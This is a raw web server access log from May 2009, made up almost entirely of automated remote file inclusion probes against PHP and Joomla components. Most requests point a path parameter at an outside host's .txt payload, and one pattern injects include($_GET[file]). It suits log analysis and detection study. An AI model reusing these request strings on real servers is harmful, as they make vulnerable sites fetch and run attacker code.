112.175.141.41 - - [30/May/2009:03:00:03 -0500] "GET /logs//?sIncPath=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 200 191354 "-""Mozilla/5.0"
112.175.141.41 - - [30/May/2009:03:01:00 -0500] "GET /logs/access_log.1235260800//?sIncPath=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
213.203.223.93 - - [30/May/2009:03:05:03 -0500] "GET /logs/access_log.1239235200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
213.203.223.93 - - [30/May/2009:03:05:03 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
213.203.223.93 - - [30/May/2009:03:05:03 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
61.81.93.142 - - [30/May/2009:03:05:13 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
61.81.93.142 - - [30/May/2009:03:05:13 -0500] "GET /logs/access_log.1242000000/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
61.81.93.142 - - [30/May/2009:03:05:16 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
213.203.223.93 - - [30/May/2009:03:06:01 -0500] "GET /logs/access_log.1239321600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
121.165.73.157 - - [30/May/2009:03:09:02 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
121.165.73.157 - - [30/May/2009:03:09:02 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.165.73.157 - - [30/May/2009:03:09:02 -0500] "GET /logs/access_log.1241654400//faqsupport/samplefaqsupport.php?path[docroot]=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
121.165.73.157 - - [30/May/2009:03:09:02 -0500] "GET /logs/access_log.1242086400//faqsupport/samplefaqsupport.php?path[docroot]=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
85.10.128.219 - - [30/May/2009:03:10:39 -0500] "GET ///include/mail.inc.php?skin_board_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
85.10.128.219 - - [30/May/2009:03:10:39 -0500] "GET /logs///include/mail.inc.php?skin_board_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
85.10.128.219 - - [30/May/2009:03:10:39 -0500] "GET /logs/access_log.1242432000///include/mail.inc.php?skin_board_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
85.10.128.219 - - [30/May/2009:03:10:59 -0500] "GET /logs/access_log.1242172800///include/mail.inc.php?skin_board_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
61.81.93.142 - - [30/May/2009:03:11:07 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
61.81.93.142 - - [30/May/2009:03:11:08 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
61.81.93.142 - - [30/May/2009:03:11:08 -0500] "GET /logs/access_log.1242000000/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
84.32.195.2 - - [30/May/2009:03:12:18 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
84.32.195.2 - - [30/May/2009:03:12:18 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
84.32.195.2 - - [30/May/2009:03:12:18 -0500] "GET /logs/access_log.1239926400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
61.81.93.142 - - [30/May/2009:03:12:30 -0500] "GET /logs/access_log.1242432000/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
216.191.52.68 - - [30/May/2009:03:12:52 -0500] "GET //install/install3.php?database=none&cabsolute_path=http://imagehut.ws/logopsd/baner.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
216.191.52.68 - - [30/May/2009:03:12:52 -0500] "GET /logs//install/install3.php?database=none&cabsolute_path=http://imagehut.ws/logopsd/baner.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
216.191.52.68 - - [30/May/2009:03:12:53 -0500] "GET /logs/access_log.1235520000//install/install3.php?database=none&cabsolute_path=http://imagehut.ws/logopsd/baner.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
216.191.52.68 - - [30/May/2009:03:12:53 -0500] "GET /logs/access_log.1236643200//install/install3.php?database=none&cabsolute_path=http://imagehut.ws/logopsd/baner.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
61.81.93.142 - - [30/May/2009:03:13:28 -0500] "GET /logs/access_log.1242432000/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
155.185.215.15 - - [30/May/2009:03:13:29 -0500] "GET /logs//install/install3.php?database=none&cabsolute_path=http://imagehut.ws/logopsd/yes.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
155.185.215.15 - - [30/May/2009:03:13:30 -0500] "GET //install/install3.php?database=none&cabsolute_path=http://imagehut.ws/logopsd/yes.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
80.237.146.58 - - [30/May/2009:03:13:56 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
80.237.146.58 - - [30/May/2009:03:13:56 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
80.237.146.58 - - [30/May/2009:03:13:56 -0500] "GET /logs/access_log.1239926400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
91.149.157.130 - - [30/May/2009:03:14:10 -0500] "GET //include/mail.inc.php?skin_board_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 304 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
91.149.157.130 - - [30/May/2009:03:14:10 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
91.149.157.130 - - [30/May/2009:03:14:10 -0500] "GET /logs/access_log.1231286400//include/mail.inc.php?skin_board_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
65.55.106.173 - - [30/May/2009:03:14:38 -0500] "GET /logs/access_log.1143331200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.146.255.11 - - [30/May/2009:03:15:53 -0500] "GET //install/install3.php?database=none&cabsolute_path=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
218.146.255.11 - - [30/May/2009:03:15:54 -0500] "GET /logs/access_log.1236643200//install/install3.php?database=none&cabsolute_path=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
218.146.255.11 - - [30/May/2009:03:15:54 -0500] "GET /logs//install/install3.php?database=none&cabsolute_path=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
218.146.255.11 - - [30/May/2009:03:16:07 -0500] "GET /logs/access_log.1235520000//install/install3.php?database=none&cabsolute_path=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
61.81.93.142 - - [30/May/2009:03:16:26 -0500] "GET //?sIncPath=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
61.81.93.142 - - [30/May/2009:03:16:26 -0500] "GET /logs/access_log.1235433600//?sIncPath=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
61.81.93.142 - - [30/May/2009:03:16:32 -0500] "GET /logs//?sIncPath=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 200 36689 "-""Mozilla/5.0"
61.81.93.142 - - [30/May/2009:03:17:29 -0500] "GET /logs/access_log.1235260800//?sIncPath=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
61.81.93.142 - - [30/May/2009:03:17:41 -0500] "GET //?sIncPath=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
61.81.93.142 - - [30/May/2009:03:17:42 -0500] "GET /logs/access_log.1235433600//?sIncPath=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
61.81.93.142 - - [30/May/2009:03:17:44 -0500] "GET /logs//?sIncPath=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 200 191354 "-""Mozilla/5.0"
91.149.157.130 - - [30/May/2009:03:17:46 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
91.149.157.130 - - [30/May/2009:03:17:46 -0500] "GET /logs/access_log.1231286400//include/mail.inc.php?skin_board_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
91.149.157.130 - - [30/May/2009:03:17:46 -0500] "GET //include/mail.inc.php?skin_board_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 304 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
61.81.93.142 - - [30/May/2009:03:18:46 -0500] "GET /logs/access_log.1235260800//?sIncPath=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
218.38.243.71 - - [30/May/2009:03:21:47 -0500] "GET ///include/print_category.php?setup[use_category]=1&dir=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
218.38.243.71 - - [30/May/2009:03:21:47 -0500] "GET /logs///include/print_category.php?setup[use_category]=1&dir=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0"
218.38.243.71 - - [30/May/2009:03:21:51 -0500] "GET /logs/access_log.1237680000///include/print_category.php?setup[use_category]=1&dir=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
218.38.243.71 - - [30/May/2009:03:22:38 -0500] "GET /logs/access_log.1239062400///include/print_category.php?setup[use_category]=1&dir=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:23:54 -0500] "GET /logs/access_log.1241740800///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:23:54 -0500] "GET ///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:23:54 -0500] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:23:58 -0500] "GET ///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:23:58 -0500] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:23:58 -0500] "GET /logs/access_log.1241740800///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:24:02 -0500] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:24:02 -0500] "GET /logs/access_log.1241740800///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:24:02 -0500] "GET ///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:24:09 -0500] "GET ///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:24:10 -0500] "GET /logs/access_log.1241740800///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:24:10 -0500] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
63.147.72.145 - - [30/May/2009:03:24:50 -0500] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
63.147.72.145 - - [30/May/2009:03:24:50 -0500] "GET /logs/access_log.1242086400/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
63.147.72.145 - - [30/May/2009:03:24:50 -0500] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
63.147.72.145 - - [30/May/2009:03:24:50 -0500] "GET /logs/access_log.1242518400/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
63.147.72.145 - - [30/May/2009:03:26:05 -0500] "GET /logs/access_log.1242000000/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
74.208.111.178 - - [30/May/2009:03:26:06 -0500] "GET /logs/access_log.1240012800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
74.208.111.178 - - [30/May/2009:03:26:06 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
74.208.111.178 - - [30/May/2009:03:26:06 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
74.208.111.178 - - [30/May/2009:03:26:27 -0500] "GET /logs/access_log.1242172800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
201.232.54.48 - - [30/May/2009:03:29:07 -0500] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 325 "-""Mozilla/5.0"
201.232.54.48 - - [30/May/2009:03:29:07 -0500] "GET /logs/access_log.1242432000/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 352 "-""Mozilla/5.0"
201.232.54.48 - - [30/May/2009:03:29:10 -0500] "GET /logs/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 330 "-""Mozilla/5.0"
201.232.54.48 - - [30/May/2009:03:29:10 -0500] "GET /logs/access_log.1242518400/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 352 "-""Mozilla/5.0"
203.194.204.129 - - [30/May/2009:03:29:12 -0500] "GET ///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.depo.org.pk/images/21/ts?? HTTP/1.1" 404 351 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
218.38.243.71 - - [30/May/2009:03:29:28 -0500] "GET ///include/print_category.php?setup[use_category]=1&dir=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
218.38.243.71 - - [30/May/2009:03:29:28 -0500] "GET /logs/access_log.1239062400///include/print_category.php?setup[use_category]=1&dir=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
218.38.243.71 - - [30/May/2009:03:29:29 -0500] "GET /logs///include/print_category.php?setup[use_category]=1&dir=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0"
75.125.245.26 - - [30/May/2009:03:29:45 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.jspipesanddrums.com/photos/footer.gif?? HTTP/1.1" 404 293 "-""Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
201.232.54.48 - - [30/May/2009:03:29:56 -0500] "GET /logs/access_log.1242172800/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 352 "-""Mozilla/5.0"
201.232.54.48 - - [30/May/2009:03:29:56 -0500] "GET /logs/access_log.1242086400/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 352 "-""Mozilla/5.0"
201.232.54.48 - - [30/May/2009:03:29:56 -0500] "GET /logs/access_log.1242259200/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 352 "-""Mozilla/5.0"
69.50.197.106 - - [30/May/2009:03:29:58 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
69.50.197.106 - - [30/May/2009:03:30:03 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
69.50.197.106 - - [30/May/2009:03:30:03 -0500] "GET /logs/access_log.1240012800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
69.50.197.106 - - [30/May/2009:03:30:20 -0500] "GET /logs/access_log.1242172800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
69.50.197.106 - - [30/May/2009:03:30:52 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
69.50.197.106 - - [30/May/2009:03:30:52 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
69.50.197.106 - - [30/May/2009:03:30:52 -0500] "GET /logs/access_log.1240012800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
69.50.197.106 - - [30/May/2009:03:31:10 -0500] "GET /logs/access_log.1242172800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
203.194.204.129 - - [30/May/2009:03:32:24 -0500] "GET ///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.depo.org.pk/images/21/ts?? HTTP/1.1" 404 351 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
83.143.81.26 - - [30/May/2009:03:33:27 -0500] "GET /logs/access_log.1242518400///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 378 "-""Mozilla/5.0"
83.143.81.26 - - [30/May/2009:03:33:27 -0500] "GET /logs///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
83.143.81.26 - - [30/May/2009:03:33:27 -0500] "GET ///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
83.143.81.26 - - [30/May/2009:03:33:57 -0500] "GET /logs///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
83.143.81.26 - - [30/May/2009:03:33:57 -0500] "GET /logs/access_log.1242518400///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 378 "-""Mozilla/5.0"
83.143.81.26 - - [30/May/2009:03:33:57 -0500] "GET ///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
83.143.81.26 - - [30/May/2009:03:34:04 -0500] "GET /logs/access_log.1242086400///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 378 "-""Mozilla/5.0"
83.143.81.26 - - [30/May/2009:03:34:12 -0500] "GET ///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
83.143.81.26 - - [30/May/2009:03:34:12 -0500] "GET /logs///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
83.143.81.26 - - [30/May/2009:03:34:12 -0500] "GET /logs/access_log.1242518400///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 378 "-""Mozilla/5.0"
83.143.81.26 - - [30/May/2009:03:34:29 -0500] "GET /logs/access_log.1242086400///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 378 "-""Mozilla/5.0"
65.55.106.120 - - [30/May/2009:03:34:39 -0500] "GET /logs/access_log.1224201600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
83.143.81.26 - - [30/May/2009:03:34:46 -0500] "GET /logs/access_log.1242086400///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 378 "-""Mozilla/5.0"
216.119.103.12 - - [30/May/2009:03:34:52 -0500] "GET /com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
216.119.103.12 - - [30/May/2009:03:34:52 -0500] "GET /logs/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.119.103.12 - - [30/May/2009:03:34:52 -0500] "GET /logs/access_log.1239408000/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
216.119.103.12 - - [30/May/2009:03:34:53 -0500] "GET /logs/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.119.103.12 - - [30/May/2009:03:34:53 -0500] "GET /logs/access_log.1239408000/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
216.119.103.12 - - [30/May/2009:03:34:53 -0500] "GET /com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
216.119.103.12 - - [30/May/2009:03:35:17 -0500] "GET /logs/access_log.1242086400/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
216.119.103.12 - - [30/May/2009:03:35:18 -0500] "GET /logs/access_log.1242086400/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
216.119.103.12 - - [30/May/2009:03:35:27 -0500] "GET /logs/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.119.103.12 - - [30/May/2009:03:35:27 -0500] "GET /com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
216.119.103.12 - - [30/May/2009:03:35:27 -0500] "GET /logs/access_log.1239408000/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
